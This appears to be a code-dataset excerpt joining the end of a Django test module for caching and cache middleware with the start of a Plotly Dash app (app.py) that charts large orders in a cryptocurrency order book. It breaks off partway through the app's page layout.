request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
app.py
|
# modules
# dash-related libraries
import dash
from dash.dependencies import Output, Event
from math import log10, floor, isnan
from datetime import datetime
from random import randint
import dash_core_components as dcc
import dash_html_components as html
import colorama
import sys
import getopt
# non-dash-related libraries
import plotly.graph_objs as go
import pandas as pd
import cbpro
import numpy as np
# modules added by contributors
import time
import threading
from queue import Queue
# custom library
from gdax_book import GDaxBook
colorama.init()
# creating variables to facilitate later parameterization
debugLevel = 3
debugLevels = ["Special Debug","Debug","Info","Warnings","Errors"]
debugColors = ['\033[34m','\033[90m','\033[32m','\033[33;1m','\033[31m']
serverPort = 8050
clientRefresh = 1
desiredPairRefresh = 10000 # (in ms) The lower it is, the better is it regarding speed of at least some pairs, the higher it is, the less cpu load it takes.
# js_extern = "https://cdn.rawgit.com/pmaji/crypto-whale-watching-app/master/main.js" # remove this. you never know when a link will be hijacked. this now load all js files from a the local source.
noDouble = True # if activatet each order is in case of beeing part of a ladder just shown once (just as a bubble, not as a ladder)
SYMBOLS = {"USD": "$", "BTC": "₿", "EUR": "€", "GBP": "£"} # used for the tooltip
SIGNIFICANT = {"USD": 2, "BTC": 5, "EUR": 2, "GBP": 2} # used for rounding
TBL_PRICE = 'price'
TBL_VOLUME = 'volume'
tables = {}
depth_ask = {}
depth_bid = {}
marketPrice = {}
prepared = {}
shape_bid = {}
shape_ask = {}
timeStampsGet = {} # For storing timestamp of Data Refresh
timeStamps = {} # For storing timestamp from calc start at calc end
sendCache = {}
first_prepare = True
first_pull = True
overallNewData = False
class Exchange:
ticker = []
client = ""
def __init__(self, pName, pTicker, pStamp):
self.name = pName
self.ticker.extend(pTicker)
self.millis = pStamp
class Pair:
# Class to store a pair with its respective threads
def __init__(self, pExchange, pTicker):
self.ob_Inst = {}
self.threadWebsocket = {}
self.threadPrepare = {}
self.threadRecalc = {}
self.Dataprepared = False
self.webSocketKill = 1
self.lastStamp = 0
self.usedStamp = 0
self.newData = False
self.name = pExchange + " " + pTicker
self.ticker = pTicker
self.lastUpdate = "0"
self.exchange = pExchange
self.prepare = False
self.websocket = False
self.combined = pExchange + pTicker
def log(pLevel, pMessage):
if pLevel >= debugLevel:
text = (str(datetime.now()) + " [" +
debugLevels[pLevel] +
"]: " + str(pMessage))
open("log.txt","a").write(text + "\n")
print(debugColors[pLevel] + text + '\033[0m')
def get_ticker_list():
with open("trading_pairs.txt") as f:
the_list = sorted(word.strip(",") for line in f for word in line.split())
log(2, the_list)
return the_list
PAIRS = [] # Array containing all pairs
E_GDAX = Exchange("GDAX", get_ticker_list(),0) # get tickers from trading_pairs.txt file.
for ticker in E_GDAX.ticker:
cObj = Pair(E_GDAX.name, ticker)
PAIRS.append(cObj)
# creates a cache to speed up load time and facilitate refreshes
def get_data_cache(ticker):
return tables[ticker]
def get_All_data():
return prepared
def getSendCache():
return sendCache
def calc_data(pair, range=0.05, maxSize=32, minVolumePerc=0.01, ob_points=60):
global tables, timeStamps, shape_bid, shape_ask, E_GDAX, marketPrice, timeStampsGet
# function to get data from GDAX to be referenced in our call-back later
# ticker a string to particular Ticker (e.g. ETH-USD)
# range is the deviation visible from current price
# maxSize is a parameter to limit the maximum size of the bubbles in the viz
# minVolumePerc is used to set the minimum volume needed for a price-point to be included in the viz
ticker = pair.ticker
exchange = pair.exchange
combined = exchange + ticker
if pair.exchange == E_GDAX.name:
# order_book = gdax.PublicClient().get_product_order_book(ticker, level=3)
order_book = pair.ob_Inst.get_current_book()
pair.usedStamp = getStamp()
ask_tbl = pd.DataFrame(data=order_book['asks'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
bid_tbl = pd.DataFrame(data=order_book['bids'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
timeStampsGet[pair.combined] = datetime.now().strftime("%H:%M:%S") # save timestamp at data pull time
# Determine what currencies we're working with to make the tool tip more dynamic.
currency = ticker.split("-")[0]
base_currency = ticker.split("-")[1]
sig_use = SIGNIFICANT.get(base_currency.upper(), 2)
symbol = SYMBOLS.get(base_currency.upper(), "")
try:
first_ask = float(ask_tbl.iloc[1, 0])
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
# prepare Price
ask_tbl[TBL_PRICE] = pd.to_numeric(ask_tbl[TBL_PRICE])
bid_tbl[TBL_PRICE] = pd.to_numeric(bid_tbl[TBL_PRICE])
# data from websocket are not sorted yet
ask_tbl = ask_tbl.sort_values(by=TBL_PRICE, ascending=True)
bid_tbl = bid_tbl.sort_values(by=TBL_PRICE, ascending=False)
# get first on each side
first_ask = float(ask_tbl.iloc[1, 0])
# get perc for ask/ bid
perc_above_first_ask = ((1.0 + range) * first_ask)
perc_above_first_bid = ((1.0 - range) * first_ask)
# limits the size of the table so that we only look at orders 5% above and under market price
ask_tbl = ask_tbl[(ask_tbl[TBL_PRICE] <= perc_above_first_ask)]
bid_tbl = bid_tbl[(bid_tbl[TBL_PRICE] >= perc_above_first_bid)]
# changing this position after first filter makes calc faster
bid_tbl[TBL_VOLUME] = pd.to_numeric(bid_tbl[TBL_VOLUME])
ask_tbl[TBL_VOLUME] = pd.to_numeric(ask_tbl[TBL_VOLUME])
# prepare everything for depchart
ob_step = (perc_above_first_ask - first_ask) / ob_points
ob_ask = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
ob_bid = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
# Following is creating a new tbl 'ob_bid' which contains the summed volume and adress-count from current price to target price
i = 1
last_ask = first_ask
last_bid = first_ask
current_ask_volume = 0
current_bid_volume = 0
current_ask_adresses = 0
current_bid_adresses = 0
while i < ob_points:
# Get Borders for ask/ bid
current_ask_border = first_ask + (i * ob_step)
current_bid_border = first_ask - (i * ob_step)
# Get Volume
current_ask_volume += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), TBL_VOLUME].sum()
current_bid_volume += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), TBL_VOLUME].sum()
# Get Adresses
current_ask_adresses += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), 'address'].count()
current_bid_adresses += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), 'address'].count()
# Prepare Text
ask_text = (str(round_sig(current_ask_volume, 3, 0, sig_use)) + currency + " (from " + str(current_ask_adresses) +
" orders) up to " + str(round_sig(current_ask_border, 3, 0, sig_use)) + symbol)
bid_text = (str(round_sig(current_bid_volume, 3, 0, sig_use)) + currency + " (from " + str(current_bid_adresses) +
" orders) down to " + str(round_sig(current_bid_border, 3, 0, sig_use)) + symbol)
# Save Data
ob_ask.loc[i - 1] = [current_ask_border, current_ask_volume, current_ask_adresses, ask_text]
ob_bid.loc[i - 1] = [current_bid_border, current_bid_volume, current_bid_adresses, bid_text]
i += 1
last_ask = current_ask_border
last_bid = current_bid_border
# Get Market Price
try:
mp = round_sig((ask_tbl[TBL_PRICE].iloc[0] +
bid_tbl[TBL_PRICE].iloc[0]) / 2.0, 3, 0, sig_use)
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
bid_tbl = bid_tbl.iloc[::-1] # flip the bid table so that the merged full_tbl is in logical order
fulltbl = bid_tbl.append(ask_tbl) # append the buy and sell side tables to create one cohesive table
minVolume = fulltbl[TBL_VOLUME].sum() * minVolumePerc # Calc minimum Volume for filtering
fulltbl = fulltbl[
(fulltbl[TBL_VOLUME] >= minVolume)] # limit our view to only orders greater than or equal to the minVolume size
fulltbl['sqrt'] = np.sqrt(fulltbl[
TBL_VOLUME]) # takes the square root of the volume (to be used later on for the purpose of sizing the order bubbles)
final_tbl = fulltbl.groupby([TBL_PRICE])[
[TBL_VOLUME]].sum() # transforms the table for a final time to craft the data view we need for analysis
final_tbl['n_unique_orders'] = fulltbl.groupby(
TBL_PRICE).address.nunique().astype(int)
final_tbl = final_tbl[(final_tbl['n_unique_orders'] <= 20.0)]
final_tbl[TBL_PRICE] = final_tbl.index
final_tbl[TBL_PRICE] = final_tbl[TBL_PRICE].apply(round_sig, args=(3, 0, sig_use))
final_tbl[TBL_VOLUME] = final_tbl[TBL_VOLUME].apply(round_sig, args=(1, 2))
final_tbl['n_unique_orders'] = final_tbl['n_unique_orders'].apply(round_sig, args=(0,))
final_tbl['sqrt'] = np.sqrt(final_tbl[TBL_VOLUME])
final_tbl['total_price'] = (((final_tbl['volume'] * final_tbl['price']).round(2)).apply(lambda x: "{:,}".format(x)))
# Following lines fix double drawing of orders in case it´s a ladder but bigger than 1%
if noDouble:
bid_tbl = bid_tbl[(bid_tbl['volume'] < minVolume)]
ask_tbl = ask_tbl[(ask_tbl['volume'] < minVolume)]
bid_tbl['total_price'] = bid_tbl['volume'] * bid_tbl['price']
ask_tbl['total_price'] = ask_tbl['volume'] * ask_tbl['price']
# Get Dataset for Volume Grouping
vol_grp_bid = bid_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
vol_grp_ask = ask_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
# Rename column names for Volume Grouping
vol_grp_bid.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
vol_grp_ask.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
# Filter data by min Volume, more than 1 (intefere with bubble), less than 70 (mostly 1 or 0.5 ETH humans)
vol_grp_bid = vol_grp_bid[
((vol_grp_bid[TBL_VOLUME] >= minVolume) & (vol_grp_bid['count'] >= 2.0) & (vol_grp_bid['count'] < 70.0))]
vol_grp_ask = vol_grp_ask[
((vol_grp_ask[TBL_VOLUME] >= minVolume) & (vol_grp_ask['count'] >= 2.0) & (vol_grp_ask['count'] < 70.0))]
# Get the size of each order
vol_grp_bid['unique'] = vol_grp_bid.index.get_level_values(TBL_VOLUME)
vol_grp_ask['unique'] = vol_grp_ask.index.get_level_values(TBL_VOLUME)
# Round the size of order
vol_grp_bid['unique'] = vol_grp_bid['unique'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['unique'] = vol_grp_ask['unique'].apply(round_sig, args=(3, 0, sig_use))
# Round the Volume
vol_grp_bid[TBL_VOLUME] = vol_grp_bid[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
vol_grp_ask[TBL_VOLUME] = vol_grp_ask[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
# Round the Min/ Max Price
vol_grp_bid['min_Price'] = vol_grp_bid['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['min_Price'] = vol_grp_ask['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_bid['max_Price'] = vol_grp_bid['max_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['max_Price'] = vol_grp_ask['max_Price'].apply(round_sig, args=(3, 0, sig_use))
# Round and format the Total Price
vol_grp_bid['total_price'] = (vol_grp_bid['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
vol_grp_ask['total_price'] = (vol_grp_ask['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
# Append individual text to each element
vol_grp_bid['text'] = ("There are " + vol_grp_bid['count'].map(str) + " orders " + vol_grp_bid['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_bid['min_Price'].map(str) + " to " + symbol +
vol_grp_bid['max_Price'].map(str) + " resulting in a total of " + vol_grp_bid[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_bid[
'total_price'].map(str))
vol_grp_ask['text'] = ("There are " + vol_grp_ask['count'].map(str) + " orders " + vol_grp_ask['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_ask['min_Price'].map(str) + " to " + symbol +
vol_grp_ask['max_Price'].map(str) + " resulting in a total of " + vol_grp_ask[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_ask[
'total_price'].map(str))
# Save data global
shape_ask[combined] = vol_grp_ask
shape_bid[combined] = vol_grp_bid
cMaxSize = final_tbl['sqrt'].max() # Fixing Bubble Size
# nifty way of ensuring the size of the bubbles is proportional and reasonable
sizeFactor = maxSize / cMaxSize
final_tbl['sqrt'] = final_tbl['sqrt'] * sizeFactor
# making the tooltip column for our charts
final_tbl['text'] = (
"There is a " + final_tbl[TBL_VOLUME].map(str) + " " + currency + " order for " + symbol + final_tbl[
TBL_PRICE].map(str) + " being offered by " + final_tbl['n_unique_orders'].map(
str) + " unique orders worth " + symbol + final_tbl['total_price'].map(str))
# determine buys / sells relative to last market price; colors price bubbles based on size
# Buys are green, Sells are Red. Probably WHALES are highlighted by being brighter, detected by unqiue order count.
final_tbl['colorintensity'] = final_tbl['n_unique_orders'].apply(calcColor)
final_tbl.loc[(final_tbl[TBL_PRICE] > mp), 'color'] = \
'rgb(' + final_tbl.loc[(final_tbl[TBL_PRICE] >
mp), 'colorintensity'].map(str) + ',0,0)'
final_tbl.loc[(final_tbl[TBL_PRICE] <= mp), 'color'] = \
'rgb(0,' + final_tbl.loc[(final_tbl[TBL_PRICE]
<= mp), 'colorintensity'].map(str) + ',0)'
timeStamps[combined] = timeStampsGet[combined] # now save timestamp of calc start in timestamp used for title
tables[combined] = final_tbl # save table data
marketPrice[combined] = mp # save market price
depth_ask[combined] = ob_ask
depth_bid[combined] = ob_bid
pair.newData = True
pair.prepare = True # just used for first enabling of send prepare
return True
# begin building the dash itself
app = dash.Dash(__name__)
# app.scripts.append_script({"external_url": js_extern})
# simple layout that can be improved with better CSS/JS later, but it does the job for now
# static_content_before contains all the info we want in our headers that won't be dynamic (for now)
static_content_before = [
html.H2('CRYPTO WHALE WATCHING APP'),
html.H3(html.A('GitHub Link Here (Consider supporting us by giving a star; request new features via "issues" tab)',
href="https://github.com/pmaji/eth_python_tracker")),
html.P([
"Legend: Bright colored mark = likely WHALE ",
"(high volume price point via 1 unique order, or many identical medium-sized orders in a ladder). ", html.Br(),
"Bubbles get darker as the number of unique orders increases. " , html.Br(),
"Hover over bubbles for more info. Note: volume (x-axis) on log-scale. " , html.Br(),
"Click 'Freeze all' button to halt refresh, "
"and hide/show buttons to pick which currency pairs to display. " , html.Br(),
"Only displays orders >= 1% of the volume of the portion of the order book displayed. ", html.Br(),
"If annotations overlap or bubbles cluster, click 'Freeze all' and then zoom in on the area of interest.", html.Br(),
